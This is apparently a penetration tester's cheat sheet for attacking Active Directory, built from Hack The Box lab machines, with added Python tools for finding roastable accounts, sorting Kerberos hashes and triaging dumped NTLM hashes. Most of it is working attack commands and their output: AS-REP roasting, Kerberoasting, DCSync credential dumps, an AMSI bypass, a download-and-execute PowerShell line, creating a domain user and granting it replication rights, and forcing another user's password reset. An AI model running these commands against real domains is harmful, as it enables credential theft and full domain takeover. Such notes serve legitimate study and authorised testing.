AD Enumeration

Common Terminology

  • Ticket Granting Ticket (TGT) - The ticket the Authentication Service issues after a successful logon. The client presents it to the TGS to request service tickets for specific resources in the domain.

  • Key Distribution Center (KDC) - The service on every domain controller that issues TGTs and service tickets. It consists of the Authentication Service and the Ticket Granting Service.

  • Authentication Service (AS) - The part of the KDC that validates the client's pre-authentication and issues the TGT, which the client later presents to the TGS to obtain service tickets.

  • Ticket Granting Service (TGS) - The part of the KDC that takes a TGT (plus an authenticator) and returns a service ticket for a specific service on a machine in the domain.

  • Service Principal Name (SPN) - A unique identifier for a service instance that ties it to the account (user or computer) the service runs as. Kerberos needs the SPN to look up that account and encrypt the service ticket with its key, which is also what makes Kerberoasting possible.

  • KDC Long Term Secret Key (KDC LT Key) - Derived from the KRBTGT account's password. It encrypts the TGT and signs the PAC.

  • Client Long Term Secret Key (Client LT Key) - Derived from the user's or computer's password. The AS uses it to verify the pre-authentication timestamp and to encrypt the session key in the AS-REP.

  • Service Long Term Secret Key (Service LT Key) - Derived from the service account's password. It encrypts the service ticket and signs the PAC.

  • Session Key - Generated by the KDC and returned with the TGT (encrypted under the client LT key). The client uses it to encrypt the authenticator it sends together with the TGT when requesting a service ticket.

  • Privilege Attribute Certificate (PAC) - Holds the user's authorization data (SID, group memberships, profile information). It travels inside the encrypted part of the ticket and is signed with the Service LT Key and the KDC LT Key so that the service and the KDC can validate it.

Attack Privilege Requirements

  • Kerbrute Enumeration - No domain access required; only network reachability to the KDC (port 88), because the AS-REQ error codes reveal whether a username exists.

  • Pass the Ticket - A valid Kerberos ticket (TGT or service ticket) extracted from a compromised user session is required.

  • Kerberoasting - Access as any domain user required (any authenticated account can request service tickets for SPNs).

  • AS-REP Roasting - No domain credentials required if you already have a list of usernames, because the DC answers the unauthenticated AS-REQ for accounts with pre-authentication disabled; with any domain account you can also query LDAP for the accounts that have the flag set.

  • Golden Ticket - The krbtgt account's hash is required, which in practice means full domain compromise (domain admin).

  • Silver Ticket - The service account's hash is required.

  • Skeleton Key - Full domain compromise (domain admin) required, since it patches LSASS on the domain controller.

## SMB/RPC enumeration over a null session (users, groups, shares, password policy)
enum4linux 10.10.129.219

Complete CrackMapExec guide

AS-REP Roasting

Normally, before the KDC hands out a TGT, the requesting party has to prove it knows its password through Kerberos pre-authentication (a timestamp encrypted with the client LT key in the AS-REQ).

Accounts with the DONT_REQ_PREAUTH option (UF_DONT_REQUIRE_PREAUTH, bit 0x400000 of userAccountControl) skip that step: the DC answers an AS-REQ from anyone who names the account, and the reply contains material encrypted with a key derived from the account's password, which can be cracked offline (hashcat mode 18200 for the etype 23 output below). AS-REP Roasting is checking which known usernames have that option set and collecting their AS-REPs. No credentials are needed, just a list of usernames, as in the command below.

$ impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users-kerbrute
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:de15a92de8e4d862924076adb6e989db$d0dfc38.....
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

User enumeration through Kerberos (kerbrute)

./kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d egotistical-bank.local -o kerbrute-users.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
## kerbrute prints "[+] VALID USERNAME: user@domain"; keep only the user part so the file can feed GetNPUsers -usersfile
cat kerbrute-users.txt | grep VALID | awk '{print $7}' | cut -d@ -f1 > users-valid.txt

Getting domain information over LDAP

## -x is a simple bind; with no -D it is anonymous. Newer OpenLDAP clients want -H ldap://10.10.10.175 instead of -h 10.10.10.175
ldapsearch -x -h 10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
## authenticated bind with a domain account
ldapsearch -x -h 10.10.10.111 -D 'svcorp2\alice' -w 'Password01' -b "DC=svcorp2,DC=com"

Useful greps on saved ldapsearch output (here redirected to data.resolute)

cat data.resolute | grep -i password      # description/info fields sometimes carry credentials
cat data.resolute | grep sAMAccountName   # account names for password spraying, kerbrute or GetNPUsers
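An added example (not part of the original notes) that automates what the greps above do by hand: it parses ldapsearch output, decodes userAccountControl into flag names, and lists the AS-REP-roastable and Kerberoastable accounts, together with the LDAP filters that ask the DC for the same thing directly. The LDIF is constructed for the example; the account and SPN names in it are invented.

```python
"""Parse ldapsearch (LDIF) output and pick out AS-REP-roastable and Kerberoastable accounts."""
import base64
import re

# userAccountControl bits, as documented by Microsoft (subset that matters for enumeration).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000

# Filters to hand to ldapsearch instead of grepping the whole dump.
# 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND, so the DC does the bit test server-side.
ASREP_FILTER = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
SPN_FILTER = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))"


def decode_uac(value):
    """Return the names of the flags set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_ldif(text):
    """Parse ldapsearch LDIF into a list of {attr: [values]} dicts (dn kept as a string).

    Handles the three LDIF details that break naive greps: comment lines, folded lines
    (a leading space continues the previous line) and base64 values written as 'attr:: ...'.
    """
    text = re.sub(r"\n ", "", text)          # unfold continuation lines
    entries, current = [], None
    for line in text.splitlines():
        if not line.strip():                 # a blank line ends an entry
            current = None
            continue
        if line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z0-9;.-]+)(::?) ?(.*)$", line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if attr == "dn":
            current = {"dn": value}
            entries.append(current)
        elif current is not None:            # trailing "search:"/"result:" lines belong to no entry
            current.setdefault(attr, []).append(value)
    return entries


def asrep_roastable(entries):
    """sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set."""
    return [
        e["sAMAccountName"][0]
        for e in entries
        if "sAMAccountName" in e and int(e.get("userAccountControl", ["0"])[0]) & DONT_REQ_PREAUTH
    ]


def kerberoastable(entries):
    """(sAMAccountName, [SPNs]) for user accounts with an SPN, skipping krbtgt and machine accounts."""
    found = []
    for e in entries:
        sam = e.get("sAMAccountName", [""])[0]
        if e.get("servicePrincipalName") and sam and sam != "krbtgt" and not sam.endswith("$"):
            found.append((sam, e["servicePrincipalName"]))
    return found


# Constructed sample in the shape ldapsearch prints; the accounts and SPNs are invented.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
#
dn: CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: fsmith
userAccountControl: 4260352

dn: CN=HSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: hsmith
userAccountControl: 66048
servicePrincipalName: HTTP/app01.egotistical-bank.local
description:: U2VydmljZSBjb250YWN0

dn: CN=SAUNA,OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: SAUNA$
userAccountControl: 532480
servicePrincipalName: HOST/SAUNA.EGOTISTICAL-BANK.LOCAL
servicePrincipalName: ldap/SAUNA.EGOTISTICAL-BANK.LOCAL

# search result
search: 2
result: 0 Success
"""

if __name__ == "__main__":
    entries = parse_ldif(SAMPLE_LDIF)
    for e in entries:
        uac = int(e.get("userAccountControl", ["0"])[0])
        print(e["sAMAccountName"][0], hex(uac), decode_uac(uac))
    print("AS-REP roastable:", asrep_roastable(entries))
    print("Kerberoastable:", kerberoastable(entries))
```

Feed it a real dump with `parse_ldif(open("data.resolute").read())`; the 0x10200 printed by Mimikatz further down is the same bitmask (NORMAL_ACCOUNT and DONT_EXPIRE_PASSWD), so `decode_uac` reads that too.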

DCSync

DCSync asks the DC to replicate account secrets over DRSUAPI, the protocol domain controllers use among themselves. It needs the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object, which is why an account that is not a local administrator on the DC (the RemoteOperations / 0x5 access-denied line below is expected) can still pull every NT hash, krbtgt included.

$ impacket-secretsdump svc_loanmgr@10.10.10.111  
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::

##################################################
## Another way: Mimikatz, from a session that already holds the DCSync rights
.\mimikatz.exe 'lsadump::dcsync /domain:egotistical-bank.local /user:Administrator' exit
  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:egotistical-bank.local /user:Administrator
[DC] 'egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/26/2021 8:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 716dbadeed0e537580d5f8fb28780d44
    
### EXAMPLE WITH THE FOREST MACHINE ###
## svc-alfresco can create users and add them to groups, and "Exchange Windows Permissions" holds WriteDacl on the
## domain object, so a new member can grant itself the replication (DCSync) rights with PowerView and then run secretsdump as that user.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user gerh Password123! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" gerh /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" gerh /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\gerh', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity gerh -Credential $Cred -Rights DCSync

User enumeration with rpcclient (null session: empty user, -N for no password)

rpcclient -U "" -N  10.10.10.111
rpcclient $> querydominfo
    Domain:         HTB
    Server:
    Comment:
    Total Users:    105
    Total Groups:   0
    Total Aliases:  0
    Sequence No:    1
    Force Logoff:   -1
    Domain Server State:    0x1
    Server Role:    ROLE_DOMAIN_PDC
    Unknown 3:      0x1
rpcclient $> enumdomusers
    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[sebastien] rid:[0x479]
    user:[lucinda] rid:[0x47a]
    user:[svc-alfresco] rid:[0x47b]
    user:[andy] rid:[0x47e]
    user:[mark] rid:[0x47f]
    user:[santi] rid:[0x480]
rpcclient $> enumdomgroups
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]          
    group:[Domain Admins] rid:[0x200]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Domain Controllers] rid:[0x204]
    group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
    group:[Service Accounts] rid:[0x47c]
    group:[Privileged IT Accounts] rid:[0x47d]
    group:[test] rid:[0x13ed]
    
## Changing another user's password with rpcclient
## Info level 23 sets a new password without knowing the current one, so this only needs the reset-password
## (User-Force-Change-Password) right over the target; NT_STATUS_PASSWORD_RESTRICTION means the new value fails the domain password policy
rpcclient -U blackfield/support 10.10.10.192
Enter BLACKFIELD\support's password: 
rpcclient $> setuserinfo2 audit2020 23 'Hackeroso'
result: NT_STATUS_PASSWORD_RESTRICTION
result was NT_STATUS_PASSWORD_RESTRICTION
rpcclient $> setuserinfo audit2020 23 'Hackeroso'
result: NT_STATUS_PASSWORD_RESTRICTION
result was NT_STATUS_PASSWORD_RESTRICTION
rpcclient $> setuserinfo audit2020 23 'H@ckeros0'
rpcclient $> exit

## Keep only the usernames from the rpcclient enumdomusers output (saved file first, live query second)
cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' | grep -v Guest > valid_users.txt
rpcclient -U "" -N 10.10.10.111 -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]' > users

Nmap LDAP scripts (every ldap* script except the brute-force ones)

nmap -n -sV --script "ldap* and not brute" 10.10.10.111 -Pn

Interesting paths

## Group Policy Preferences: Groups.xml under the Default Domain Policy GUID ({31B2F340-016D-11D2-945F-00C04FB984F9})
## can carry a "cpassword" attribute. It is AES-encrypted with a key Microsoft published, so gpp-decrypt recovers the plaintext.
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

Installing bloodhound-python

If you have domain credentials you can run the Python BloodHound ingestor from any platform, so you do not depend on a Windows host.
Download it from
https://github.com/fox-it/BloodHound.py

systemctl restart docker
git clone https://github.com/fox-it/BloodHound.py.git
docker build -t bloodhound .
docker run -v ${PWD}:/bloodhound-data -it bloodhound

## -c all runs every collection method; -ns points DNS resolution at the DC so the domain names resolve
bloodhound-python -u alice -p Password01 -d svcorp.com -gc sv-dc01.svcorp.com -c all -ns 10.10.10.111

Kerberoasting with impacket-GetUserSPNs

## lists the accounts with an SPN; -request asks the TGS for a ticket for each one and writes them in hashcat/john format (hashcat -m 13100 for etype 23)
impacket-GetUserSPNs svcorp.com/alice -dc-ip 10.10.10.111 -request -outputfile hashes.kerberoast
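An added example, not part of the original notes, that handles the output of both impacket-GetNPUsers (the $krb5asrep$ line in the AS-REP Roasting section) and impacket-GetUserSPNs: it parses each hash line into account, realm, SPN and encryption type, checks that the checksum length matches the etype, and groups the lines by the hashcat mode that cracks them, since hashcat takes one mode per run. The ciphertext in the sample is made up, and the two TGS lines are invented to show the RC4 and AES layouts; the AES-format layout and the '~' used as port separator in the SPN are how I read impacket's output and are assumptions.

```python
"""Sort the hash lines written by impacket's GetNPUsers (AS-REP) and GetUserSPNs (TGS-REP) by hashcat mode."""
import re

# (kind, etype) -> hashcat mode. RC4 (etype 23) cracks far faster than AES (17/18), so start with those.
HASHCAT_MODES = {
    ("asrep", 23): 18200,
    ("tgs", 23): 13100,
    ("tgs", 17): 19600,
    ("tgs", 18): 19700,
}

# Layouts as impacket writes them (assumption for the AES form: the '*spn*' block moves after the realm).
_ASREP = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$")
_TGS_RC4 = re.compile(r"^\$krb5tgs\$(\d+)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$")
_TGS_AES = re.compile(r"^\$krb5tgs\$(\d+)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$")


def parse_krb5_hash(line):
    """Split one $krb5asrep$/$krb5tgs$ line into its fields; raise ValueError on anything else."""
    line = line.strip()
    m = _ASREP.match(line)
    if m:
        etype, user, realm, checksum, edata = m.groups()
        kind, spn = "asrep", None
    else:
        m = _TGS_RC4.match(line) or _TGS_AES.match(line)
        if not m:
            raise ValueError("not an impacket Kerberos hash line: %r" % line[:40])
        etype, user, realm, spn, checksum, edata = m.groups()
        kind = "tgs"
        spn = spn.replace("~", ":")   # impacket writes the SPN port separator as '~' (assumption, see lead-in)
    etype = int(etype)
    # RC4-HMAC carries a 16-byte HMAC-MD5 checksum, the AES types a 12-byte HMAC-SHA1-96; anything else is corrupt.
    expected = 32 if etype == 23 else 24
    return {
        "kind": kind, "etype": etype, "user": user, "realm": realm, "spn": spn,
        "checksum": checksum, "edata": edata,
        "checksum_ok": len(checksum) == expected and len(edata) % 2 == 0,
    }


def split_by_mode(lines):
    """Group parsed hashes by hashcat mode (None for unsupported etypes); non-hash lines are ignored."""
    groups = {}
    for line in lines:
        if not line.strip().startswith("$krb5"):
            continue       # banner, blank, or "[-] User ... doesn't have UF_DONT_REQUIRE_PREAUTH set"
        rec = parse_krb5_hash(line)
        groups.setdefault(HASHCAT_MODES.get((rec["kind"], rec["etype"])), []).append(rec)
    return groups


# Constructed sample: the AS-REP line follows the fsmith output from the notes but with made-up ciphertext,
# and the two TGS lines are invented to show the RC4 and AES layouts.
SAMPLE_OUTPUT = """\
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:de15a92de8e4d862924076adb6e989db$d0dfc38f0b9a9c2b5a0f1e7d3c4b5a6978695a4b3c2d1e0f1a2b3c4d5e6f7081
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5tgs$23$*svc_sql$XOR.COM$MSSQLSvc/xor-app23.xor.com~1433*$3a1f9c2d4e5b6a7980f1e2d3c4b5a697$9f8e7d6c5b4a39281706f5e4d3c2b1a00112233445566778899aabbccddeeff0
$krb5tgs$18$svc_web$XOR.COM$*HTTP/xor-web01.xor.com*$a1b2c3d4e5f60718293a4b5c$00112233445566778899aabbccddeeff0123456789abcdef0123456789abcdef
"""

if __name__ == "__main__":
    for mode, recs in sorted(split_by_mode(SAMPLE_OUTPUT.splitlines()).items(), key=lambda kv: kv[0] or 0):
        for r in recs:
            print(f"hashcat -m {mode}: {r['user']}@{r['realm']} etype={r['etype']} spn={r['spn']} ok={r['checksum_ok']}")
```

Write each group to its own file and run hashcat once per mode; a record whose `checksum_ok` is false was truncated when it was copied and will never crack, so re-request it rather than burning GPU time on it.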

Meaning of the hash aad3b435b51404eeaad3b435b51404ee

It is the LM hash of an empty string. Modern Windows does not store LM hashes, so secretsdump prints this constant in the lmhash column of every account; it carries no password information. Its NT counterpart, 31d6cfe0d16ae931b73c59d7e0c089c0, is the NT hash of an empty password and does mean something: the account (Guest in the DCSync output above) has a blank password.
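An added example (not part of the original notes) that covers the DCSync output above and this section: it parses secretsdump's `user:rid:lmhash:nthash:::` lines, flags the two well-known hashes, reports NT hashes shared between accounts (password reuse), and checks a small wordlist against the dump by computing NT hashes itself. MD4 is implemented inline because hashlib often lacks it on OpenSSL 3 builds. The svc_backup rows and the wordlist are constructed; the first three rows are the ones printed in the DCSync section.

```python
"""Triage impacket-secretsdump NTDS output: well-known hashes, reused hashes and quick dictionary checks."""
import struct

# LM hash of "" : printed for every account once LM storage is disabled (the default); carries no information.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of "" : the account really has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; NT hash = MD4(UTF-16LE(password))."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    rounds = (
        # (mixing function, additive constant, message word order, per-step shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for f, const, order, shifts in rounds:
            for j in range(16):
                i = (-j) % 4                       # update a, d, c, b in turn
                v[i] = rotl((v[i] + f(v[(i + 1) % 4], v[(i + 2) % 4], v[(i + 3) % 4])
                             + x[order[j]] + const) & MASK, shifts[j % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()


def parse_secretsdump(text):
    """Rows for lines shaped [domain\\]user:rid:lmhash:nthash:::, skipping banners, [*] lines and Kerberos keys."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
            continue
        rows.append({
            "user": parts[0].split("\\")[-1],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return rows


def triage(rows, wordlist):
    """Map user -> findings: blank password, stored LM hash, NT hash shared with other accounts, dictionary hit."""
    users_by_nt = {}
    for r in rows:
        users_by_nt.setdefault(r["nt"], []).append(r["user"])
    candidates = {nt_hash(w): w for w in wordlist}   # hash the wordlist once, compare against every row
    findings = {}
    for r in rows:
        notes = []
        if r["nt"] == EMPTY_NT:
            notes.append("blank password")
        if r["lm"] != EMPTY_LM:
            notes.append("LM hash stored (crack with hashcat -m 3000)")
        others = [u for u in users_by_nt[r["nt"]] if u != r["user"]]
        if others:
            notes.append("NT hash shared with " + ", ".join(others))
        if r["nt"] in candidates:
            notes.append("password is %r" % candidates[r["nt"]])
        findings[r["user"]] = notes
    return findings


# The first three rows are the ones shown in the DCSync section; the svc_backup rows are constructed.
SAMPLE_DUMP = """\
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
EGOTISTICAL-BANK.LOCAL\\svc_backup_old:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    for user, notes in triage(parse_secretsdump(SAMPLE_DUMP), ["Winter2021!", "password"]).items():
        print(f"{user:16} {'; '.join(notes) or '-'}")
```

The dictionary check is only for a handful of obvious candidates; a real crack of the NT column still goes to hashcat -m 1000. The shared-hash finding is the one worth reading first: any account that shares the krbtgt or Administrator hash is an instant win without cracking anything.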

GetUserSPN.ps1

Get-TGSCipher.ps1

.\Get-TGSCipher.ps1 -SPN "MSSQLSvc/xor-app23.xor.com:1433" -Format John
